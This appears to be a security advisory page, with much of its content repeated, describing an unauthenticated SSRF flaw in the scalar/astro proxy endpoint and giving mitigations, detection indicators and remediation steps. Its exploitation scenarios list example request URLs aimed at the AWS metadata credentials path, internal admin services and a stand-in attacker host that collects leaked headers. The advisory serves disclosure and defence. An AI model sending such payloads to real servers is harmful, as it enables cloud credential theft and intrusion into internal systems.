scalar/astro Proxy Endpoint Unauthenticated SSRF (CVE-2026-30118)

Executive Summary

A critical unauthenticated Server-Side Request Forgery (SSRF) vulnerability (CVE-2026-30118) has been disclosed in scalar/astro v0.1.13, the Astro integration package for the Scalar API documentation platform. The flaw resides in the Scalar Proxy endpoint, which accepts a scalar_url query parameter that is used to construct backend HTTP requests without adequate validation.

An unauthenticated attacker can supply an attacker-controlled URL via this parameter, causing the backend server to issue HTTP requests to arbitrary destinations — including internal network resources, cloud metadata services, and other infrastructure that would otherwise be inaccessible from the public internet.

CVSS Score: 9.8 (Critical)

Vulnerability Overview

Attribute	Value
CVE ID	CVE-2026-30118
CVSS Score	9.8 (Critical)
Type	Server-Side Request Forgery (SSRF) — CWE-918
Attack Vector	Network
Attack Complexity	Low
Privileges Required	None
User Interaction	None
Affected Parameter	`scalar_url` query parameter in Scalar Proxy endpoint
Affected Package	`scalar/astro` v0.1.13
Public Exploit	Not confirmed at publication
Published	2026-05-19

Affected Products

Product	Version	Status
scalar/astro	v0.1.13 and prior	Vulnerable

Scalar is a popular open-source API documentation platform with integrations for various frameworks. The @scalar/astro package provides integration with the Astro static site framework, enabling developers to embed interactive API documentation with a built-in proxy for making test API requests directly from documentation pages.

Technical Details

Vulnerability Root Cause

The Scalar Proxy endpoint is designed to relay API requests from the browser to backend API servers, bypassing CORS restrictions for documentation use cases. The endpoint accepts a scalar_url query parameter specifying the target URL for the proxied request.

The vulnerability arises because:

The scalar_url parameter accepts arbitrary URLs without validation
The server makes outbound HTTP requests to the supplied URL on behalf of the client
No allowlist or blocklist is applied to restrict the target URL to safe, expected destinations
Authentication is not required to invoke the proxy endpoint

Exploitation Scenarios

Scenario 1: Cloud Metadata Service Access (AWS)
  GET /scalar-proxy?scalar_url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
  → Server fetches AWS instance metadata, returning temporary IAM credentials
 
Scenario 2: Internal Service Enumeration
  GET /scalar-proxy?scalar_url=http://10.0.0.1:8080/admin
  → Server probes internal services not accessible from the internet
 
Scenario 3: Credential Interception
  GET /scalar-proxy?scalar_url=http://attacker.example.com/collect
  → Server makes outbound request to attacker server, revealing:
    - Server IP address
    - Internal hostname/DNS resolution
    - HTTP headers (including any auth tokens forwarded)
 
Scenario 4: SSRF to Internal APIs
  GET /scalar-proxy?scalar_url=http://internal-api.company.internal/admin/reset-password
  → Attacker triggers privileged operations on internal systems

Why CVSS 9.8?

The score reflects the combination of unauthenticated access, network-accessible exploitation, low complexity, and no user interaction. SSRF vulnerabilities targeting cloud environments are particularly dangerous because metadata services (AWS IMDSv1, GCP metadata API, Azure IMDS) can return temporary credentials that provide broader cloud account access. The 9.8 score stops short of 10.0 only because the scope impact category is unchanged (attacker interacts with adjacent systems rather than escaping a defined security boundary).

Impact Assessment

Impact Area	Description
Cloud Credential Theft	Access to AWS/GCP/Azure metadata endpoints leaking instance credentials
Internal Network Scanning	Enumerate and probe internal services not exposed to the internet
Sensitive Data Exposure	Read internal APIs returning configuration, secrets, or user data
Privilege Escalation	Cloud credentials from metadata can be used to escalate privileges in the cloud environment
DoS via Amplification	Force server to make many outbound requests, consuming bandwidth or triggering rate limits

Recommendations

Immediate Actions

Upgrade to a patched version of @scalar/astro — check the Scalar GitHub releases for a fix addressing CVE-2026-30118
Disable or restrict the Scalar Proxy endpoint if interactive API testing is not required in your documentation deployment
Block outbound requests to metadata service IPs at the network/firewall level as a defense-in-depth measure:
- AWS: 169.254.169.254
- GCP: 169.254.169.254 / metadata.google.internal
- Azure: 169.254.169.254
Enforce IMDSv2 on AWS instances to require session-oriented metadata requests (mitigates metadata SSRF even if the application is vulnerable)

Code-Level Mitigation (Until Patch Applied)

If you must run the vulnerable version, consider adding a middleware layer to validate the scalar_url parameter against an allowlist:

// Example: Astro middleware to restrict scalar_url
export const onRequest = defineMiddleware(async (context, next) => {
  const url = new URL(context.request.url);
  if (url.pathname.includes('scalar-proxy')) {
    const scalarUrl = url.searchParams.get('scalar_url');
    if (scalarUrl) {
      const allowedHosts = ['api.yourservice.com', 'localhost'];
      const targetUrl = new URL(scalarUrl);
      if (!allowedHosts.includes(targetUrl.hostname)) {
        return new Response('Forbidden', { status: 403 });
      }
    }
  }
  return next();
});

AWS IMDSv2 Enforcement

# Require IMDSv2 on existing EC2 instances
aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890abcdef0 \
  --http-tokens required \
  --http-endpoint enabled
 
# Apply to all instances in a region
aws ec2 describe-instances --query 'Reservations[].Instances[].InstanceId' --output text | \
  xargs -I{} aws ec2 modify-instance-metadata-options --instance-id {} --http-tokens required

Detection Indicators

Indicator	Description
Requests to `/scalar-proxy` with `scalar_url` pointing to RFC1918 addresses	Internal network SSRF attempt
Outbound requests to `169.254.169.254` from web server process	Metadata service SSRF attempt
Requests to unusual external hosts via the proxy endpoint	Potential SSRF to attacker infrastructure
Spike in outbound HTTP requests from the application server	Possible scanning or data exfiltration via SSRF

Post-Remediation Checklist

Update @scalar/astro — verify the installed version is patched: npm list @scalar/astro
Rotate cloud credentials if you suspect metadata service access may have occurred
Review cloud trail/audit logs (AWS CloudTrail, GCP Audit Logs, Azure Activity Log) for unexpected API calls from the application's IAM role
Enforce IMDSv2 across all cloud instances as a permanent hardening measure
Audit all proxy-style endpoints in your application for similar SSRF patterns
Update firewall rules to block outbound requests to metadata service IP ranges from web tier hosts

References

Executive Summary

CVSS Score: 9.8 (Critical)

Vulnerability Overview

Attribute	Value
CVE ID	CVE-2026-30118
CVSS Score	9.8 (Critical)
Type	Server-Side Request Forgery (SSRF) — CWE-918
Attack Vector	Network
Attack Complexity	Low
Privileges Required	None
User Interaction	None
Affected Parameter	`scalar_url` query parameter in Scalar Proxy endpoint
Affected Package	`scalar/astro` v0.1.13
Public Exploit	Not confirmed at publication
Published	2026-05-19

Affected Products

Product	Version	Status
scalar/astro	v0.1.13 and prior	Vulnerable

Technical Details

Vulnerability Root Cause

The vulnerability arises because:

The scalar_url parameter accepts arbitrary URLs without validation
The server makes outbound HTTP requests to the supplied URL on behalf of the client
No allowlist or blocklist is applied to restrict the target URL to safe, expected destinations
Authentication is not required to invoke the proxy endpoint

Exploitation Scenarios

Scenario 1: Cloud Metadata Service Access (AWS)
  GET /scalar-proxy?scalar_url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
  → Server fetches AWS instance metadata, returning temporary IAM credentials
 
Scenario 2: Internal Service Enumeration
  GET /scalar-proxy?scalar_url=http://10.0.0.1:8080/admin
  → Server probes internal services not accessible from the internet
 
Scenario 3: Credential Interception
  GET /scalar-proxy?scalar_url=http://attacker.example.com/collect
  → Server makes outbound request to attacker server, revealing:
    - Server IP address
    - Internal hostname/DNS resolution
    - HTTP headers (including any auth tokens forwarded)
 
Scenario 4: SSRF to Internal APIs
  GET /scalar-proxy?scalar_url=http://internal-api.company.internal/admin/reset-password
  → Attacker triggers privileged operations on internal systems

Why CVSS 9.8?

Impact Assessment

Impact Area	Description
Cloud Credential Theft	Access to AWS/GCP/Azure metadata endpoints leaking instance credentials
Internal Network Scanning	Enumerate and probe internal services not exposed to the internet
Sensitive Data Exposure	Read internal APIs returning configuration, secrets, or user data
Privilege Escalation	Cloud credentials from metadata can be used to escalate privileges in the cloud environment
DoS via Amplification	Force server to make many outbound requests, consuming bandwidth or triggering rate limits

Recommendations

Immediate Actions

Upgrade to a patched version of @scalar/astro — check the Scalar GitHub releases for a fix addressing CVE-2026-30118
Disable or restrict the Scalar Proxy endpoint if interactive API testing is not required in your documentation deployment
Block outbound requests to metadata service IPs at the network/firewall level as a defense-in-depth measure:
- AWS: 169.254.169.254
- GCP: 169.254.169.254 / metadata.google.internal
- Azure: 169.254.169.254
Enforce IMDSv2 on AWS instances to require session-oriented metadata requests (mitigates metadata SSRF even if the application is vulnerable)

Code-Level Mitigation (Until Patch Applied)

If you must run the vulnerable version, consider adding a middleware layer to validate the scalar_url parameter against an allowlist:

// Example: Astro middleware to restrict scalar_url
export const onRequest = defineMiddleware(async (context, next) => {
  const url = new URL(context.request.url);
  if (url.pathname.includes('scalar-proxy')) {
    const scalarUrl = url.searchParams.get('scalar_url');
    if (scalarUrl) {
      const allowedHosts = ['api.yourservice.com', 'localhost'];
      const targetUrl = new URL(scalarUrl);
      if (!allowedHosts.includes(targetUrl.hostname)) {
        return new Response('Forbidden', { status: 403 });
      }
    }
  }
  return next();
});

AWS IMDSv2 Enforcement

# Require IMDSv2 on existing EC2 instances
aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890abcdef0 \
  --http-tokens required \
  --http-endpoint enabled
 
# Apply to all instances in a region
aws ec2 describe-instances --query 'Reservations[].Instances[].InstanceId' --output text | \
  xargs -I{} aws ec2 modify-instance-metadata-options --instance-id {} --http-tokens required

Detection Indicators

Indicator	Description
Requests to `/scalar-proxy` with `scalar_url` pointing to RFC1918 addresses	Internal network SSRF attempt
Outbound requests to `169.254.169.254` from web server process	Metadata service SSRF attempt
Requests to unusual external hosts via the proxy endpoint	Potential SSRF to attacker infrastructure
Spike in outbound HTTP requests from the application server	Possible scanning or data exfiltration via SSRF

Post-Remediation Checklist

Update @scalar/astro — verify the installed version is patched: npm list @scalar/astro
Rotate cloud credentials if you suspect metadata service access may have occurred
Review cloud trail/audit logs (AWS CloudTrail, GCP Audit Logs, Azure Activity Log) for unexpected API calls from the application's IAM role
Enforce IMDSv2 across all cloud instances as a permanent hardening measure
Audit all proxy-style endpoints in your application for similar SSRF patterns
Update firewall rules to block outbound requests to metadata service IP ranges from web tier hosts

scalar/astro Proxy Endpoint Unauthenticated SSRF (CVE-2026-30118)

Affected Products

Executive Summary

Vulnerability Overview

Affected Products

Technical Details

Vulnerability Root Cause

Exploitation Scenarios

Why CVSS 9.8?

Impact Assessment

Recommendations

Immediate Actions

Code-Level Mitigation (Until Patch Applied)

AWS IMDSv2 Enforcement

Detection Indicators

Post-Remediation Checklist

References

Typecho 1.3.0 Pingback SSRF via X-Pingback Manipulation (CVE-2026-7025)

CVE-2026-26135: Azure Custom Locations SSRF Enables Privilege Escalation (CVSS 9.6)

CVE-2026-5016: elecV2P SSRF Vulnerability in URL Handler Allows Remote Attack

scalar/astro Proxy Endpoint Unauthenticated SSRF (CVE-2026-30118)

Affected Products

Executive Summary

Vulnerability Overview

Affected Products

Technical Details

Vulnerability Root Cause

Exploitation Scenarios

Why CVSS 9.8?

Impact Assessment

Recommendations

Immediate Actions

Code-Level Mitigation (Until Patch Applied)

AWS IMDSv2 Enforcement

Detection Indicators

Post-Remediation Checklist

References

Typecho 1.3.0 Pingback SSRF via X-Pingback Manipulation (CVE-2026-7025)

CVE-2026-26135: Azure Custom Locations SSRF Enables Privilege Escalation (CVSS 9.6)

CVE-2026-5016: elecV2P SSRF Vulnerability in URL Handler Allows Remote Attack